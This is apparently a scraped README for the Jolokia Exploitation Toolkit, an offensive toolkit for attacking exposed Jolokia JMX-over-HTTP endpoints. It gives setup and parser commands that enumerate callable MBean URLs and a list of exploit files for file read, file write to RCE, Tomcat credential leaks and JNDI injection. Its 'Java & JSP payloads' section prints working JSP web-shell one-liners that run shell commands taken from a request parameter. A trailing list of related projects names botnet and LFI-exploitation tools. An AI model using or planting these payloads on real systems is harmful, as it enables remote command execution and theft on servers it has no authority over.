Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

Last update: Jan 01, 2023

Overview

jolokia-exploitation-toolkit

Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

Core concept

Jolokia is a protocol bridge that enables users to interact with MBeans (JMB) through HTTP. This endpoint "exposed JMX features" which are often dangerous, this implies that /jolokia should never be exposed, and if used internally (loopback), should be protected by an authentication mechanism.

Doc says... :)

Jolokia is a JMX-HTTP bridge giving an alternative to JSR-160 connectors. It is an agent based approach with support for many platforms. In addition to basic JMX operations it enhances JMX remoting with unique features like bulk requests and fine grained security policies.

Where to find jolokia

Java projects
/jolokia
/actuator/jolokia
???

Test setup

You can either startup a tomcat server (docker || docker-compose) and install the jolokia war,
Or run docker run --rm -it --net=host bodsch/docker-jolokia and go with the flow ~

Setup & Usage

# Setup with virtualenv
virtualenv -p python3 .venv && source .venv/bin/activate
pip install -r requirements.txt

# Use jolokia-parser.py with remote url
python jolokia-parser.py http://127.0.0.1/jolokia | tee jolokia-parsed.lst
# Use jolokia-parser.py with local json
curl http://127.0.0.1/jolokia/list -o jolokia-list.json
python jolokia-parser.py jolokia-list.json | sed 's#^/jolokia#http://127.0.0.1/jolokia#g' | tee jolokia-parsed.lst

The expected output in jolokia-parsed.lst is the following:

http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName
http://127.0.0.1/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor
[+] CLASS : javax.management.MBeanServerDelegate
[+] DESC  : Represents  the MBean server from the management point of view.
[+] DESC  : getRecordingOptions // returns javax.management.openmbean.TabularData
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/getRecordingOptions/$long
[+] DESC  : takeSnapshot // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/takeSnapshot
[+] DESC  : closeRecording // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/closeRecording/$long
[+] DESC  : newRecording // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/newRecording
[+] DESC  : setRecordingSettings // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingSettings/$long/$javax.management.openmbean.TabularData
[+] DESC  : openStream // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/openStream/$long/$javax.management.openmbean.TabularData
[+] DESC  : cloneRecording // returns long
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/cloneRecording/$long/$boolean
[+] DESC  : setRecordingOptions // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/setRecordingOptions/$long/$javax.management.openmbean.TabularData
[+] DESC  : copyTo // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/copyTo/$long/$java.lang.String
[+] DESC  : startRecording // returns void
http://127.0.0.1/jolokia/exec/jdk.management.jfr:type=FlightRecorder/startRecording/$long
[...]

Java & JSP payloads

<%=Runtime.getRuntime().exec(request.getParameter(String.valueOf(42))).getInputStream()%> <%= new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("RESULT").next() %> ">

<% Runtime.getRuntime().exec(new String[] { "sh", "-c", "cmd" }); %>
<%=Runtime.getRuntime().exec(request.getParameter(String.valueOf(42))).getInputStream()%>
<%= new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("RESULT").next() %>

Contributors & Content

@TheLaluka
- jolokia-parser.py | Convert /jolokia/list or json blob to human-readable urls
- exploits/file-write-to-rce-vhost-jfr.md | File read and file write to RCE by deploying a vhost with MBeanFactory/createStandardHost and DiagnosticCommand/jfrStart
- exploits/file-read-compilerdirectivesadd.md | File read with DiagnosticCommand/compilerDirectivesAdd
- exploits/file-write-to-rce-vmLog.md | File write to RCE with DiagnosticCommand/vmLog
@Coiffeur0x90
- exploits/file-write-to-rce-valve.py | File write with Catalina:host=localhost,name=AccessLogValve (exploit)
- exploits/file-write-to-rce-valve.md | File write with Catalina:host=localhost,name=AccessLogValve (article)
- exploits/info-leak-tomcat-creds.py | Tomcat credentials leak with Users:database=UserDatabase,type=UserDatabase
@mpgn_x64
- exploits/jndi-logback.md | XXE to RCE with ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL
RicterZ
- exploits/jndi-injection-MBeanFactory.py | RCE with JNDI Injection (Tomcat EL) with MBeanFactory
@lely__
- exploits/jndi-ldap-target.md | RMI injection with java.lang:type=Memory
You should be here? Let me know and I'll fix that!

Jolokia Exploitation Toolkit (JET) helps exploitation of exposed jolokia endpoints.

Related tags

Overview

jolokia-exploitation-toolkit

Core concept

Where to find jolokia

Test setup

Setup & Usage

Java & JSP payloads

Contributors & Content

Sources & References

Owner

Laluka

Rouge Spammers with a mission to disrupt the peace of the valley ? Fear not we will STOMP the Spammers

pybotnet - A Python Library for building Botnet , Trojan or BackDoor for windows and linux with Telegram control panel

🎻 Modularized exploit generation framework

Python program that generates secure passwords.

vulnerable APIs

Learning to compose soft prompts for compositional zero-shot learning.

BETA: Layla - recon tool for bug bounty

A CTF2.5/MMF2 Decompiler

A python tool capable of creating HUGE wordlists. Has the ability to add custom words for concatenation in any way you see fit.

Ethereum transaction decoder (community version).

Proof-of-concept obfuscation toolkit for C# post-exploitation tools

Phoenix Framework is an environment for writing, testing and using exploit code.

SQLi Google Dork Scanner (new version)

Ini membuat tema berbasis bendera Indonesia with Python + Linux.py

Privacy-respecting metasearch engine

Yet another web fuzzer

Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI

A traceroute tool that also displays IP information

Midas ELF64 Injector is a tool that will help you inject a C program from source code into an ELF64 binary.

NEW FACEBOOK CLONER WITH NEW PASSWORD, TERMUX FB CLONE, FB CLONING COMMAND. M